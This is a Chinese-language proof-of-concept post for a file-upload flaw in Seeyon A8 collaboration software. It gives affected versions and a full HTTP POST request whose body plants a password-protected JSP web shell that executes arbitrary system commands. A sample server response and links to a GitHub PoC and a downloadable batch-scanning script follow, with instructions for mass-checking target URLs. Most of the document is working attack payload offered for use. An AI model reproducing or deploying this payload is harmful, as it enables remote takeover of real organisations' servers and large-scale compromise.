漏洞影响产品版本：

致远A8-V5协同管理软件 V6.1sp1

致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3

致远A8+协同管理软件V7.1

漏洞情况：

访问/seeyon/htmlofficeservlet出现DBSTEP V3.0 0 21 0 htmoffice operate err”’

POST包：

  POST /seeyon/htmlofficeservlet HTTP/1.1

  Content-Length: 1121

  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

  Host: xxxxxxxxx

  Pragma: no-cache



  DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV

  OPTION=S3WYOSWLBSGr

  currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66

  CREATEDATE=wUghPB3szB3Xwg66

  RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6

  originalFileId=wV66

  originalCreateDate=wUghPB3szB3Xwg66

  FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6

  needReadFile=yRWZdAS6

  originalCreateDate=wLSGP4oEzLKAz4=iz=66

  <%@ page language="java" import="java.util.,java.io." pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("
"+excuteCmd(request.getParameter("cmd")) + "
");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce


响应包：
  DBSTEP V3.0 386 0 666 DBSTEP=OKMLlKlV

  OPTION=S3WYOSWLBSGr

  currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66

  CREATEDATE=wUghPB3szB3Xwg66

  RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6

  originalFileId=wV66

  originalCreateDate=wUghPB3szB3Xwg66

  FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6

  needReadFile=yRWZdAS6

  originalCreateDate=wLSGP4oEzLKAz4=iz=66

  CLIENTIP=wLCXqUKAP7uhw4g5zi=6

<%@ page language="java" import="java.util.,java.io." pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("
"+excuteCmd(request.getParameter("cmd")) + "
");}else{out.println(":-)");}%>


GitHub：
https://github.com/euphrat1ca/OtherScript/blob/3edfb9fbfa43fa4abe2cf5c5b014950ce4416699/exploit/seeyonPOC.txt
批量检测:
在脚本同目录下建立url.txt，放入待检测的URL，运行脚本。
链接:https://pan.baidu.com/s/1VbJcrEiG4_lein8-KP6stQ 提取码:qadu